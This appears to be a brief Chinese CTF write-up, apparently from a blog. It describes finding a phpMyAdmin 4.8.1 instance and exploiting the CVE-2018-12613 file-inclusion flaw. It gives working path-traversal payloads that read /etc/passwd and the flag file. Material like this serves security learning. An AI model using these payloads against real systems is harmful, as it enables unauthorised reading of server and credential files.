打开环境访问看到

提示我有一个数据库，但里面什么都没有，于是拿dirsearch跑了一下，没有出结果

但是有数据库嘛，那么试试常见的几个加上phpmyadmin 试试

于是看到了版本是4.8.1 拿到信息

百度一下 phpmyadmin4.8.1 漏洞

看到最多的是文件包含漏洞 编号 CVE-2018-12613

那么思路肯定就是复现漏洞了，于是开始找 poc 然后直接开打

构造payload

index.php?target=db_datadict.php%253f../../../../../../etc/passwd

发现回显

最后的payload

index.php?target=db_datadict.php%253f../../../../../../flag

得到flag

最新文章

1. 获取url传参
2. 图片缩放应用（nearest / bilinear / three-order interpolate）
3. Android抽象布局——include、merge 、ViewStub
4. ADB调试桥安装（方式二）
5. Java设计模式系列之动态代理模式(转载)
6. [转]在 Windows Server 2012 上安装 IIS 8
7. SQL SERVER 主键约束
8. 理解OAuth 2.0--转
9. JQUERY1.9学习笔记 之属性选择器(一) 前缀选择器
10. python_嵌套列表变成普通列表
11. 【山东省选2008】郁闷的小J 平衡树Treap
12. forfiles命令批处理删除过期文件
13. 利用ffmpeg做视频解码的顺序
14. Android 高级控件（七）——RecyclerView的方方面面
15. [Linux]安装node.js
16. eclipse安装插件配置Android开发环境
17. php 网站中文简体繁体转换类
18. bootstrap模态框input不能获取焦点并编辑【转】
19. 题目1162：I Wanna Go Home（最短路径问题进阶dijkstra算法)）
20. SSM三层模型之间的参数传递

热门文章

1. NC16618 [NOIP2008]排座椅
2. 抓到 Netty 一个 Bug，顺带来透彻地聊一下 Netty 是如何高效接收网络连接的
3. shell判断参数值是否在数组内的方法
4. Three.js系列: 在元宇宙看电影，享受 VR 视觉盛宴
5. AlterNats是如何做到高性能的发布订阅的？
6. IDEA快捷键-03
7. 【C++】从设计原理来看string类
8. Linux系统安全与应用
9. ACWing93.递归实现组合型枚举
10. AtCoder Beginner Contest 261E // 按位思考 + dp